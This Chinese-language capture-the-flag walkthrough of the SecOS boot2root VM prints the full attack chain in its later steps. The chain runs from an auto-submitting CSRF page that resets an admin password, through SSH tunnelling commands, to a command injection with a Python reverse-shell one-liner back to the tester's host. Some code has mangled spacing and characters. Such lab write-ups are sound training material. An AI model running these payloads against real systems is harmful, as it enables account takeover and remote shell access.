SecOS Chanllenge

关于SecOS的介绍，官网描述如下:

Not too tired afterBSides London? Still want to solve challenges? Here is the VM Itold about during my talk where you'll have to practice some ofyour skills to retrieve the precious flag located here:/root/flag.txt. This VM is an entry-level boot2root and is webbased. This VM is the first of a series which I'm currentlycreating where there will be links between all of them. Basically,each machine in the series will rely/depend on each other, so keepthe flags for the next VMs. This has been tested onVirtualBox and gets its IP from the DHCP server. Moreover, if youfind yourself bruteforcing, you're doing something wrong. It isnot needed and it wasn't designed to be done this way. Instead,focus on exploiting web bugs! If you have any questions,feel free to ask me on Twitter @PaulWebSec or throw me a mail:paulwebsec(at)gmail(dot)com

1. 下载地址

SecOS-1.tar.gz(Size:599 MB) Download (Mirror):http://download.vulnhub.com/secos/SecOS-1.tar.gz Download(Torrent): http://download.vulnhub.com/secos/SecOS-1.tar.gz.

2. SecOS 主机发现，端口探测

端口探测前，先完成主机发现操作，以便节约扫描时间。 上述信息可以看出: SecOS主机IP： 192.168.1.110 测试者主机IP： 192.168.1.113

3. 检测服务，发现csrf漏洞,

漏洞扫描完成后，发现主机开放 ssh，http (8081) ，分析8081端口，发现存在可用web页面，链接如下： http://192.168.1.110:8081/ http://192.168.1.110:8081/about http://192.168.1.110:8081/change-password http://192.168.1.110:8081/hint http://192.168.1.110:8081/login http://192.168.1.110:8081/logout http://192.168.1.110:8081/messages http://192.168.1.110:8081/send-message http://192.168.1.110:8081/sign-up http://192.168.1.110:8081/user http://192.168.1.110:8081/users 在 http://192.168.1.110:8081/hint  、页面，发现可用信息. <div class="jumbotron">      <p><i>Are you sure there's something to see here?</i></p>      <!--              First: the admin visits the website (really) frequently              Second: He runs it locally, on 127.0.0.1.              Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough      !--> </div> 经过进一步确认，证实csrf 问题存在。下一步计划构造csrf攻击页面，并发消息给超级管理员。 在测试者主机 192.168.1.113 上构建攻击页面，代码如下: <html> <head> <title>CSRF -Password Reset</title> <scripttype="text/javascript"> function Foo() { document.getElementById("csrf").submit() } </script> </head> <bodyοnlοad=Foo()> <formid="csrf"action="http://127.0.0.1:8081/change-password"method="POST"> <inputtype="text" name="username"value="spiderman"> <inputtype="password" name="password"value="password"> <buttontype="submit">ChangePassword</button> </form> </body> </html>

4. 获取ssh登录密码，发现命令执行漏洞

发送csrf链接给超级管理员SecOs后，几分钟后链接被自动激活，密码被重置。 利用帐号 spiderman/CrazyPassword! ，ssh登录主机。发现目录/tmp, /vnwa, /vnwa目录下文件internalServer.js 存在代码执行问题, 不过只限本地访问. 利用ssh，建立socks代理，这样做，可以让测试者通过代理端口，访问SecOS环境中的端口. SSH -D 1080 -N -f spiderman@192.168.1.110 使用上述命令后，攻击者可利用代理，成功访问9000端口， SSH -L 192.168.1.110:80:127.0.0.1:9000 spiderman@192.168.1.110 使用第二条命令，可直接访问80端口, 并成功注入命令.假设测试者在本地监听端口4444,可使用下面方法获取 反弹shell. -c4 127.0.0.1;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

参考链接:

http://vulnhub.com/entry/secos-1,88/ http://resources.infosecinstitute.com/secos-challenge/#comment-1182247